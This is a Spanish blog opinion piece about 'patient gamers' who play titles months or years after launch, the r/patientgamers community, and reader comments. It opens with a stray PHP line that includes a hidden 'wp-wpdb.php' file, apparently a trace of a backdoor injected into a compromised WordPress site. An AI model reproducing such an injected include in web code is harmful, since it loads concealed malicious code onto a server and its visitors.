if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); El club de los jugadores pacientes – La Fortaleza de LeChuck

El club de los jugadores pacientes

Desde que las redes sociales nos absorbieron, vivimos pendientes de lo que se dice y cuándo se dice en ese escaso periodo de tiempo en el que un tema es popular. En los videojuegos hablaríamos del hype, esa emoción pasajera con el título de turno que hace que la gente se lance de cabeza el día del lanzamiento. Un grupo de jugadores, cansados de esto, han decidido tomárselo con calma y disfrutar de los juegos años después de su salida.

Ya hablé hace unos meses de «jugar cuando es tendencia«, esa fiebre por devorar los juegos de moda y finiquitarlos sin apenas saborearlos. Sin embargo, cada vez son más los jugadores que no pueden llevar ese ritmo y deciden plantarse y esperar. Curiosamente, hace unas semanas, empecé Zelda: Breath of the Wild y subí una imagen a Twitter mostrando a mi Link en el precioso prado de Hyrule. Algunos usuarios me deseaban que lo disfrutara pero otros se sorprendieron por no haberlo jugado antes. El juego se lanzó en marzo, y estamos acabando mayo, pero ya nadie habla de él y parece que jugar a un bombazo 2 meses después es de locos. Ya es tarde y otro juego habrá acaparado el hype del aficionado.

Son muchos los jugadores esclavos de las tendencias. Por un lado tenemos a los fans, aquellos jugadores que expresan su pasión semanas previas al lanzamiento y los días después. Y en el lado opuesto están los haters/trolls, cuyo trabajo es desprestigiar un juego por cualquier nimiedad que se les ocurra. Ambos grupos se suben al carro del hype a su manera y hacen explosionar las redes con sus comentarios. Cuando pasan unas semanas, no se sabe nada más de ellos. Como ejemplos tenemos a Zelda y Mass Effect Andromeda respectivamente.

A todo esto se le suma el creciente problema de la industria: los juegos a medio hacer. Comprar el día de lanzamiento se traduce en bugs, malas optimizaciones, problemas en el multijugador, etc. Por todo ello, muchos se plantean meter el freno y simplemente disfrutar sin plazos ni fechas. Bajo esta premisa nació Patient Gamers en Reddit.

Los «Patient Gamers» establecen que solo se pueden publicar juegos de al menos seis meses de antigüedad, tiempo suficiente para evitar el hype desenfrenado y los batallones de haters. En este subreddit, la discusión es calmada y amigable, ya que los juegos no son lo suficientemente nuevos para ser blanco de trolls ni de usuarios demasiado apasionados.

El Subreddit de Patient Gamers se gestó hace cinco años cuando un usuario publicó en /r/gaming que acababa de comprar Fallout New Vegas y buscaba gente para hablar del juego. En ese momento, muchos jugadores abrieron los ojos y se vieron en la misma situación: comprar un juego meses o años después y no tener a nadie para charlar. El resultado fue «Patient Gamers», y su éxito fue rotundo, alzándose hoy con 123.647 usuarios suscritos.

Si echamos un vistazo rápido, en la primera página aparecen juegos como L.A Noire (2011) o Dragon Age Origins (2009) Pero también hay hilos fijados para citar los juegos a los que están jugando esa semana y recomendaciones varias.

Algunos usuarios explican que se convirtieron en jugadores pacientes simplemente porque no tenían dinero para una consola o ampliar su PC, pero luego descubrieron las ventajas de esperar. Los jugadores pacientes compran juegos más baratos, parcheados y sin la avalancha de fanboys/haters sobre sus espaldas. La espera también hace que encuentren un gran surtido de mods y de ediciones con todos los DLCs. Además, no van a la carrera por terminarlo cuanto antes, se toman el tiempo que desean, exploran cada rincón del juego y pueden sacar los logros sin la estúpida necesidad de demostrar al mundo que fueron los primeros.

Cada vez hay más jugadores que se unen a las filas del club de los jugadores pacientes, cansados del ritmo vertiginoso que las redes y la industria nos ocasionan. Personalmente, poco a poco intento aproximarme a este grupo para volver a la época donde saboreaba los juegos sin un cronómetro en mi cabeza.

Publicada el
Categorizado como Opinión

Por Arashi

Aparte de patear traseros de piratas como gobernadora en Mêlée, soy una fanática de los videojuegos desde que de pequeña me regalaron la Atari 2600. Adoro las aventuras gráficas y los RPG, pero no le hago ascos al resto. Otra de mis pasiones es todo lo relacionado con Japón.

6 comentarios

  1. Si te digo que estoy jugando al Metroid Zero Mission de la GBA… Mira si soy paciente, jejeje. Yo intento no leer demasiado de los juegos que quiero jugar, por que no sé cuando los podré jugar. En mi lista de pendientes hay de todo y de todas las plataformas. Si un juego merece la pena, da igual cuando lo juegues. Uno de los últimos que he jugado es Inside y me ha encantado!!

  2. Los precios, ediciones GOTY , los mods además de los parches, son razones por las cuales soy un jugador paciente. También porque al trabajar, quedar con amigos y ver a mi familia, tengo menos tiempo libre que cuando estudiaba, muchos juegos sin acabarme, luego puedo esperar y no comprar en lanzamiento.
    Consolas también me las pillo con tiempo y visibilidad del catálogo.
    La ps4, sin retrocompatibilidad, me está costando pillarla.

    Me regalaron el mass effect andromeda de lanzamiento por mi cumple, y me comí el editor de personajes un poco mejorable (un personaje hecho regular para toda mi aventura… ) Y cero mods

    Conozco gente que tiene esa fiebre del lanzamiento, del momento de salida. Le digo, qué más te da jugar dentro de un año? Y me dice que dentro de un año tendrá la impresión de perderse los lanzamientos de ese año.
    Puedo entender esa filosofía para algun MMORPG como un Destiny, que hay un momento para jugar con la comunidad, pero para un the Witcher 3…

    1. Sin duda el tiempo es un factor esencial cuando crecemos, pero aún así algunos sacrifican horas de sueño para jugar a las últimas novedades.

      A esa gente que conoces con la fiebre del lanzamiento, es lo que comentaba en el artículo que enlazo, simplemente quieren hablar del juego de moda, aquel del que todo el mundo en las redes y webs comenta. El problema llega cuando se juntan muchos lanzamientos como hemos tenido en marzo, que se empiezan a devorar cual fastfood.

      Como bien dices, en los juegos de multjugador online tienen un plazo de caducidad, pero los juegos de campaña no importa realmente el momento.

      Es un tema en el que muchos pecamos pero yo estoy empezando a echar el freno.
      Un saludo.

  3. No sabia que era un jugador paciente pero no hay duda de que encajo en el perfil del articulo.

    Soy jugador de JRPGs de SNES, PSX, PS2, GC, WII y GBA, pero no sé si encajo como jugador paciente o jugador retro.
    Ahora estoy jugando al fantástico Breath of Fire 3 (PSX), y anteriormente he jugado a los Golden Sun (GBA), Tales of Phantasia (SNES), Rogue Galaxy (PS2) y al mítico Skies of Arcadia Legends (GC).
    Juegos con años a sus espaldas, y como los disfruto, jugandolos a mi ritmo y sacandoles todo el jugo.
    Me encantaría tener la SWICH pero mi lista de pendientes es tan grande que no tengo ninguna ansiedad.

Dejar un comentario